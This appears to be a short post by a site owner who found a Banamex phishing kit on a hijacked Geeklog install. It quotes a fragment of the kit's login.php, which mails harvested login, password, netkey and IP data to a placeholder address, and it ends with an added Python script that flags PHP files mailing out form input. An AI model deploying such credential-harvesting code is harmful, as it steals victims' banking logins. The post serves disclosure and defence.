I recently went in and triaged a Geeklog install I haven't touched in a few months. Lo and behold, it had been hijacked by scammer spammers. Here is login.php:
$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$message .= "Netkey: ".$_POST['netkey'];
$message .= $ip = getenv("REMOTE_ADDR");
//sending email info here
$subj = "Bancanet - Banamex";
$from = "From: Info
mail("email@example.com", $subj, $message, $from);
My ISP was complaining of mail sent. This was probably it. There are a lot of references in the index.htm and verificacion.html to banamex.com. Check out this particular segment of verificacion.htm:
How and where is the money made here? Harvesting accidental logins... There is one redirection to "istemp.com":
Anyone know anything about this?
Update: Here's the phishing alert. It's from 2005.
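For triaging the rest of a web root after a find like this, the following sketch flags PHP files that pass request input to mail(), the pattern login.php above uses. It is an added example, not code from the original post. The function name and sample strings are constructed for illustration, and the check is a line-based heuristic that produces candidates for review (legitimate contact forms will match too).

```python
import re

# "$v = ..." or "$v .= ..." (but not ==, =>); group 2 is the right-hand side.
ASSIGN_RE = re.compile(r"(\$\w+)\s*\.?=(?![=>])(.*)")
MAIL_RE = re.compile(r"\bmail\s*\((.*)\)")      # arguments of a mail() call
VAR_RE = re.compile(r"\$\w+")
REQUEST_INPUT = {"$_POST", "$_GET", "$_REQUEST"}

def find_form_mailers(php_source):
    """Return (line_no, variable) for each mail() argument that is request
    input or was assembled from it on an earlier line."""
    tainted = set(REQUEST_INPUT)
    hits = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        code = line.strip()
        if code.startswith(("//", "#", "*")):   # skip comment lines
            continue
        call = MAIL_RE.search(code)
        if call:
            used = set(VAR_RE.findall(call.group(1)))
            hits.extend((line_no, var) for var in sorted(used & tainted))
        assign = ASSIGN_RE.search(code)
        if assign and set(VAR_RE.findall(assign.group(2))) & tainted:
            tainted.add(assign.group(1))        # propagate through $message .= ...
    return hits

# Constructed sample modelled on the login.php shown above (placeholder From header).
SAMPLE_KIT = '''<?php
$message .= "Login: ".$_POST['ncliente'];
$message .= "Password: ".$_POST['pass'];
$subj = "constructed subject";
$from = "From: placeholder@example.com";
mail("email@example.com", $subj, $message, $from);
'''

# Constructed benign sample: mail() with no request input involved.
SAMPLE_BENIGN = '''<?php
$name = "admin";
$body = "Nightly backup finished for " . $name;
mail("ops@example.com", "backup", $body);
'''

if __name__ == "__main__":
    for label, src in (("kit", SAMPLE_KIT), ("benign", SAMPLE_BENIGN)):
        print(label, find_form_mailers(src))
```

Run it over each .php file under the document root and review every hit alongside file modification times.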